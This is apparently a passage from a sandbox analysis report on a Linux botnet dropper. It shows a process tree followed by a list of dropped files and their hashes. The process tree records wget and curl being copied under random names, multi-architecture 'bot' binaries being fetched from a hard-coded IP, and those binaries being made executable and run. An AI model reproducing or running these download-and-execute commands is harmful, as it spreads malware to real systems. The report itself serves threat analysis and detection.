  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.mips bot.mpsl bot.ppc bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:952
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.m68k
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:953
- /bin/cat
  cat bot.m68k
  2⤵
  PID:954
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.m68k bot.mips bot.mpsl bot.ppc bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:955
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/cp
  cp /usr/bin/wget ./sfdhesrfyhdjh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:957
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.m68k bot.mips bot.mpsl bot.ppc bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:958
- /tmp/sfdhesrfyhdjh
  ./sfdhesrfyhdjh http://103.172.79.74/bot.sh4
  2⤵
  - Executes dropped EXE
  PID:959
- /usr/bin/wget
  wget http://103.172.79.74/bot.sh4
  2⤵
  PID:960
- /bin/cp
  cp /usr/bin/curl ./sfghfsdhdfhysdgs
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:961
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.m68k bot.mips bot.mpsl bot.ppc bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:962
- /tmp/sfghfsdhdfhysdgs
  ./sfghfsdhdfhysdgs -O http://103.172.79.74/bot.sh4
  2⤵
  - Executes dropped EXE
  - Reads runtime system information
  - Writes file to tmp directory
  PID:963
- /bin/cat
  cat bot.sh4
  2⤵
  PID:964
- /bin/chmod
  chmod +x bot.arc bot.arm bot.arm5 bot.arm6 bot.arm7 bot.i468 bot.i686 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 bot.spc bot.x86 bot.x86_64 na.sh RUN sfdhesrfyhdjh sfghfsdhdfhysdgs
  2⤵
  PID:965
- /tmp/RUN
  ./RUN
  2⤵
  - Executes dropped EXE
  PID:966

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/RUN

Filesize
205B

MD5
590bb4d773eeb9fe6b927ba68ee5a235

SHA1
117bd0b37e57701ddc2b0377c52c07128702b3f7

SHA256
c32518cf32b76b5a5f856bbedc865ef6097a68a062f0541e0aa8ef0d2a7d00fd

SHA512
81b8b966a0aa5948f0ad2f72675168fe4758d83bf376460fbb22b0a5a416c96f036d78b06971873a4b50b3c791f177f2109639e984058b19c296b04158571615

Download Submit
/tmp/RUN

Filesize
206B

MD5
d0ca9e115c1baec0d0acf3c54fe35801

SHA1
077a818982f7eb506ed5fd27d1781c8c06aad7da

SHA256
2b735aaedc7bdc26b15bf0ab29abb51950fafeb0f7dc66d365b87e342b238cee

SHA512
2afd512a9e9d40206742bbdcd41633092c3516a8a189ecbaa2aa86d7c65d856fb7199e2ddec817eda6dfdb0079a24460868cca8c4a623117146764044ddb37b4

Download Submit
/tmp/RUN

Filesize
206B

MD5
cdcdeda46b327ca4018ea7158c1cc94c

SHA1
64f254bfb172acacd6c938fe6cc868ca49bbac99

SHA256
bf272757812571347802a0ca8c5be9cea260b47164fe23afd5a7d9c041222048

SHA512
8819dfdfc4a39552d69333081de8081065c34d1c398df28f79612e05a0f117d67cab941fe355a184193f651f4ae38ec63a4153b213ad5e8e288997dcb7def59a

Download Submit
/tmp/RUN

Filesize
208B

MD5
781012617b8877ebc3941d643e570d49

SHA1
3c53c4f693e5df49ba3e6b494c9138bb16b3d888

SHA256
e4437e7139f70f5eed21f434046795f3dd767e946210da9271f47ed4bf5a1b70

SHA512
371f65ae3201dd5105ccd5bbb38b42069496deeabdb88af8706c5edcc41749e17fcf784709bb5f10875d6161eb9e3ff71d775c60ae3d43a770135444fdd0796c

Download Submit
/tmp/RUN

Filesize
206B

MD5
f30c73f9f4ca8088ebad02d86d34c47c

SHA1
569103dc4440e43d33c1ddaba4eb15720e223581

SHA256
b88a4c5dfb4aa38e97940f66bf4ed8361f0e782d362a0de607e3b5a34185da0d

SHA512
1a6122ca47987672afa47afd9c05eba4a0d70f16b8188d782fef015edeba5fc59c086278a7012ccd8a29b34d4851c711635bdb2ede52583d80ca60b891978a4d

Download Submit
/tmp/RUN

Filesize
205B

MD5
c60b2fde40680ec9d0b4ff52b0d3cff6

SHA1
87d43ee3528f0f13b056ddbe897c41b89b3be5d3

SHA256
032fe0a70c7674f82eb5a875a0ff805c074c3ad339df2b36a50097672f9c68ee

SHA512
ba83607801b239ad15cd7c2b7048c3367f3f7e4bc55ad8fbf2db961b5adcc344be0cfe295aa4211c35f113f24728cefc799b3988e670e7f802e989993d0594f1

Download Submit
/tmp/RUN

Filesize
206B

MD5
94c6f33e1b44928a210ef00804134f90

SHA1
891374040d4de6d9356b17b6fc6c4c5e069fc3e0

SHA256
c02199bea6099278589e4738b3585503c3c651f3a49b93c36d9328d86a12896f

SHA512
7a702306b315488bb38e1fe36d60e06c6c39d1af95f1d29d7ffa910bbb440eecb0fc45e1dd9240dabed3b15146c7667b80fcd128a125382311fc4165792a842c

Download Submit
/tmp/RUN

Filesize
206B

MD5
9d017aa72e4256bbca2f6f222d07592d

SHA1
bfdae68413e80e16de3871f5d2248c0ba31f9a05

SHA256
46256b4d6131f026bc056e062c8e2748a0beb3e479db921b1bf01774397a4f29

SHA512
9dab122ba365ea687ea6c6c1e83eadded4253030d9dc2569e883e49a194ba99a62d0c988864bdcf56a0f78968e18f1ce13e0eb6a53c12502cc6912ec7dabb74e

Download Submit
/tmp/RUN

Filesize
206B

MD5
601818789eb509784b64098de77da996

SHA1
09b74e4d8a6ee8028437158d51085be8d96a7f87

SHA256
178e2f2818de883e173ca3a7d43c7594cca19a9d5b06d940fdbf54d60bcb619c

SHA512
f1553b84ebf8ea56148c822df590502d1d96e5bea58dd92a6e5278e28d84821a97122b737d2702a35992644078bd5823eb27c05bd38b817b3707a87f9e7e4a7b

Download Submit
/tmp/RUN

Filesize
205B

MD5
1b9eed7c466bc2a0e224da68c277a845

SHA1
b2f62802338500f9f76fe12223255d5a4abddf94

SHA256
3779850a4c1ad5d2896cabd5d8a9b9a7fba0a9f445f2ca9ebd0db29f8ff3029d

SHA512
728ef318c83c37c7e0d3ebf046fc1463fcd6acdb3853f541b79531ce14dc116532c6fe11d1f53399cd88e0984b4a8234a2c548d5b53e0ae6e55e8d3e41aff444

Download Submit
/tmp/RUN

Filesize
205B

MD5
06b39536fc8d7a11c1b9ef3ae538a629

SHA1
2d49e131b8b4aa36b5526e857532295d520e3857

SHA256
600538cda78a945572565a0410020e2fb1b6b62d873ab6faf3b1eeeb47612811

SHA512
9a2e038d3d8e12388f0b2014de567db2a4a2278c0443a5d308f471d13e2aaeabe4ea0923f14960792f0f01dd1a001558f0964e24dd8cb402dbbcafb7e3cac827

Download Submit
/tmp/RUN

Filesize
206B

MD5
d892c8244a73cf979cc77e1d4a7e68e9

SHA1
dc4d384798874e82d4a65ef07e361c778fadcb30

SHA256
96363ba2f7bc3c0f5a157d8d02dc0c0b1c58698cebcd43eeda23a2d2e0fcd83b

SHA512
eb7f794108b34ad6e2ab890890196972d1b408d73ea135707cb1b620efea00a6e1e7baea5c575fe0c362184682af6cffc40cd4aeee69139111c1f502f2bcd9a6

Download Submit
/tmp/RUN

Filesize
205B

MD5
174b1c5b0c1e628466a179c5e07b9d31

SHA1
8da8500e7ed8624d6c0907485cb0cdac9a557dfc

SHA256
63881f66a504eb14ac4eb1b0405a3433d82ef14133e9f67b131388e9b825e50c

SHA512
d8fdda6e6b0a89b8355afb3e7e163f5e6a92e844d556209583cb6aea503e904118a1cfd296afabb726cfc2f2a91dd4f1b777550c08f5b87b69f89b234afec25e

Download Submit
/tmp/RUN

Filesize
206B

MD5
6be0aa51ad40671c359fc624d3db983b

SHA1
fbf6d609c1b591d981ebb1f27f90a2b60ab907e5

SHA256
a7d57138d8721255a0cfc0f546816a8c803b5c92765f1b310e1f04de1fe7a990

SHA512
ded37cef1a19c1229faac71354e745b095e989f3b311fa35befabcbf251e5d0644290a5a6ef2b5fa6d5bed886165b3a85de1ed8cb27ffa10af53537312c4a164

Download Submit
/tmp/bot.x86

Filesize
205B

MD5
c31a83e5f400a2118ddd35f0fecd77c8

SHA1
aca5c3a67cd4d67356449e03191e33c18eef11f7

SHA256
5fd72692f2c19340a6d339c2d06bca366fbada99e7b6e862644d416f0e20c725

SHA512
ddab1a51f1c5b89415a37cef1adb6b88a8b562f65e549e57af1d89f256a10c1565191a47ca2d1bbedb79b3c62c54219d3356e69f7a0ea27aa8720bd26d996091

Download Submit
/tmp/sfdhesrfyhdjh

Filesize
536KB

MD5
4a7c9f69532775b790e8d999f73a68b9

SHA1
9cf4d3d57284103e828dcaa514bfa76e84366472

SHA256
ba3dee31b794d6e0e2df228a87f54f3432100a4acfee8f1a7a64d2584cd80495

SHA512
925d73442f8a824ac2c016d1ce12293b30ced91cc3954ef74dbd604fc7b4a6c60227c82c52e5491ec3ba8d20a2a8d3b3b6739ef64cc242b9335a756f6631b128

Download Submit
/tmp/sfghfsdhdfhysdgs

Filesize
186KB

MD5
7bca13eb125880aa2615ae9f836ac7fd

SHA1
884a53c9f84f5b57735da52e2672aa46e282567a

SHA256
e3c97425e53915f35f1e8315b39d827714c81142a8e6899b7d45cefa9a31f6af

SHA512
45dc3f8d7ef327785ded043dfe981c9d4eb1faabc1362ad634e3c7795f0f925a9c9b2842d1f8cc19bc125c0d71b42365cb2ad669d2543d2b9bcad6b3c782d1c4

Download Submit